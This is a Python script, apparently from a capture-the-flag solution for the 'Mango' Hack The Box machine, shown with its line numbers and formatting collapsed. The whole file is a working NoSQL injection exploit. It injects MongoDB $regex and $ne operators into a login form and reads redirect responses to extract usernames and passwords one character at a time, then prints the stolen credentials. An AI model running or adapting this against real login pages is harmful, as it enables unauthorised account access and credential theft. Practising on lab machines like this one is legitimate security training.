1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79
| import string import requests
url = "http://staging-order.mango.htb/index.php" headers = {"Host": "staging-order.mango.htb"} possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c for c in string.punctuation]
def main(): usernames = get_users() if usernames: print('Finished!') for username in usernames: password = get_password(username) print('{}:{}'.format(username, password)) else: print('Not Found!')
def get_users(): usernames = [] payload = {"username[$regex]":"","password[$regex]":".*", "login":"login"}
for c in possible_chars: username = "^" + c payload["username[$regex]"] = username + ".*" r = requests.post(url, data=payload, headers=headers, allow_redirects=False) if r.status_code == 302: print("username start with character:" + c) for x in range(0, get_username_length() - 1): for c2 in possible_chars: payload["username[$regex]"] = username + c2 + ".*" r2 = requests.post(url, data=payload, headers=headers, allow_redirects=False) if r2.status_code == 302: username += c2 print(username[1:]) break print("Found username: {}".format(username[1:])) usernames.append(username[1:])
return usernames
def get_password(username): payload = {"username": username, "password[$regex]": "", "login": "login"} password = "^" for x in range(0, get_pass_length(username)): for c in possible_chars: payload["password[$regex]"] = password + c + ".*" r = requests.post(url, data=payload, headers=headers, allow_redirects=False) if r.status_code == 302: password += c print(password[1:]) break password = password[1:].replace("\\", "") print("Found {}'s password: ".format(username) + password) return password
def get_username_length(): length = 1 while True: payload = {"username[$regex]": ".{{{}}}".format(length), "password[$ne]":"", "login":"login"} r =requests.post(url, data=payload, headers=headers, allow_redirects=False) if r.status_code == 302: length += 1 else: return length -1
def get_pass_length(username): length = 1 while True: payload = {"username": username, "password[$regex]": ".{{{}}}".format(length), "login": "login"} r = requests.post(url, data=payload, headers=headers, allow_redirects=False) if r.status_code == 302: length += 1 else: return length -1
if __name__ == '__main__': main()
|